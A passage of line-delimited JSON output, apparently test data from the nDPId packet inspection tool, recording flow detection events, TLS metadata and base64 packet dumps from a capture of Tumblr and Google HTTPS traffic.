+00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23347,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605292119370,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292119370,"pkt":"qtsDr8lk5EKm5WPyht1gB9dmACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAO4aoBuwkMYXdt3wkTgBAGDPrTAAABAQgKuCcls8LdJNk="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23348,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605292119458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292119458,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgLAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvhqm3fCRMJDGF4gBAMQfSOAAABAQgKwt3Va7gmdTA="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23349,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:808::200e","src_port":58004,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23349,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gBWy\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICAAAAAAAACAO4pQBuzf4sNBRRFrJgBAB9RDeAAABAQgKzK1LLsLdJJ0="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23350,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:806::200e","src_port":55014,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23350,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gD6CDACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIBgAAAAAAACAO1uYBu2Ue7VYDxGJbgBAB9U4jAAABAQgKcJlSucLdI9M="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23351,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292120654,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292120654,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:811::2004","src_port":49002,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23351,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1605292120654,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120654,"pkt":"qtsDr8lk5EKm5WPyht1gCJJIACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIEQAAAAAAACAEv2oBu3NXQRgXN+V5gBAZpzN2AAABAQgKIY69b8LdKhI="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23359,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":2,"flow_last_seen":1605292120839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120839,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgIAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvilFFEWsk3+LDRgBALmwajAAABAQgKwt3a98yslWg="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23360,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":2,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120853,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgGAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvW5gPEYltlHu1XgBALmkPeAAABAQgKwt3bBnCYnCU="} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23362,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1605292120853,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292120853,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgRAAAAAAAAIAQqAcsBIEmLB5kd7IUo3\/YpAbu\/ahc35XlzV0EZgBAPBj1lAAABAQgKwt3bBiGODSw="} +00611{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121486,"flow_last_seen":1605292121486,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292121486,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23415,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1605292121486,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121486,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+osAAAAAoAL9IJMMAAACBAWgBAIICpi1TMUAAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23416,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":2,"flow_last_seen":1605292121507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292121507,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAEpymhYqAcsBIEmLB5kd7IUo3\/YpAbupQGb5NYUDXPqMoBJXgPvWAAACBAV4AQMDAwQCCArC3d2UmLVMxQ=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23417,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":3,"flow_last_seen":1605292121507,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121507,"pkt":"qtsDr8lk5EKm5WPyht1gCYf1ACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABKcpoWqUABuwNc+oxm+TWGgBAB+3\/SAAABAQgKmLVM28Ld3ZQ="} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23418,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292121486,"flow_last_seen":1605292121507,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292121507,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292121674,"flow_last_seen":1605292121674,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605292121674,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:817::200a","src_port":55560,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23420,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1605292121674,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121674,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v36ZlfzugBAB9Zh5AAABAQgKG7m2dMLdLYw="} +01016{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23421,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292121486,"flow_last_seen":1605292121697,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":1917,"flow_avg_l4_payload_len":319,"midstream":0,"thread_ts_msec":1605292121697,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01286{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23427,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605292121486,"flow_last_seen":1605292121698,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1400,"flow_tot_l4_payload_len":5614,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1605292121698,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::4a72:9a16","src_port":43328,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Tumblr","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"catasters.tumblr.com","server_names":"*.tumblr.com,tumblr.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"738f0c3c6e00286f3afac626676d352d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA","subjectDN":"CN=*.tumblr.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"14:78:BA:5B:B5:54:5D:A1:2C:D2:79:4C:42:99:BB:3A:A9:DB:86:C2"}} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1605292121698,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292121698,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACAGPSoAFFBABwgXAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbvZCJmV\/O79d79\/gBALlo7gAAABAQgKwt3eUxu5BaQ="} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122064,"flow_last_seen":1605292122064,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122064,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23631,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1605292122064,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122064,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGkAAAAAoAL9IOE8AAACBAWgBAIICthbOh0AAAAAAQMDBw=="} +00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23633,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1605292122076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":172,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":172,"pkt_l4_len":118,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAHYGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2Qd9sejoTgBgk6QsuAAABAQgKJEeQFMLc4vQXAwMAUQAAAAAAAAAPN+72C7wfHoQtmaJB3aOHKjPk6JlEWLNjF5TOq7HiJ1O2KSnCxtEIEQAeO4GmbeSTOkkpawAah7BKsajx09L6L57ZkTTcEWLCJA=="} +00559{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23634,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1605292122076,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":132,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":132,"pkt_l4_len":78,"thread_ts_msec":1605292122076,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTAE4GQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2QjVsejoTgBgk6YPXAAABAQgKJEeQFMLc4vQXAwMAKQAAAAAAAAAQ4G\/3mQ3kGgQra1eBqPYCTvM1QPmaUoG2gBnwdZPdmFLU"} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23650,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1605292122094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122094,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgJAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbvBjCTTL5FAHmhqoBJXgI\/cAAACBAV4AQMDAwQCCArC3d\/Z2Fs6HQ=="} +00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23654,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1605292122094,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122094,"pkt":"qtsDr8lk5EKm5WPyht1gAy+bACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICQAAAAAAACAOwYwBu0AeaGok0y+SgBAB+xPQAAABAQgK2Fs6O8Ld39k="} +00952{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23657,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122064,"flow_last_seen":1605292122094,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122094,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00617{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605292122095,"flow_last_seen":1605292122095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605292122095,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23664,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1605292122095,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122095,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5CzgAAAAAoAL9IPiAAAACBAWgBAIIChLBJ8gAAAAAAQMDBw=="} +00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00678{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23851,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":32,"flow_first_seen":1605292102602,"flow_last_seen":1605292122118,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":16900,"flow_avg_l4_payload_len":528,"midstream":1,"thread_ts_msec":1605292122118,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24118,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1605292122163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605292122163,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgLAAAAAAAAIAoqAcsBIEmLB5kd7IUo3\/YpAbuW0O3zbp+IuQs5oBJXgJ7NAAACBAV4AQMDAwQCCArC3d\/9EsEnyA=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24126,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1605292122163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605292122163,"pkt":"qtsDr8lk5EKm5WPyht1gD2uVACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICwAAAAAAACAKltABu4i5Cznt826ggBAB+yKbAAABAQgKEsEoDMLd3\/0="} +00964{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":24188,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605292122095,"flow_last_seen":1605292122163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605292122163,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00993{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24239,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122064,"flow_last_seen":1605292122177,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:809::200e","src_port":49548,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"apis.google.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01005{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24429,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605292122095,"flow_last_seen":1605292122212,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605292122212,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80b::200a","src_port":38608,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"ajax.googleapis.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24626,"source":"tumblr.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1605292122439,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":203,"pkt_l4_len":149,"thread_ts_msec":1605292122439,"pkt":"qtsDr8lk5EKm5WPyht1gDKQRAJUGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFwAAAAAAACAK2QgBu\/13v3+ZlfzugBgB9aL3AAABAQgKG7m5ccLd3lMXAwMAcFVxaXihuhejZCNpZ5nuv6bEN9Yj5XMBxAt2QHwyRgmT6ybDwC5C73DyglYgxmIhMzt282zpUtE5GphT7ONBXskP6qssi1eNQHysgmBFeTvR+6kSeL0yhYhtFPIEYfWd8KPo3wOHIQIgFNXMNqMrZ9Q="} 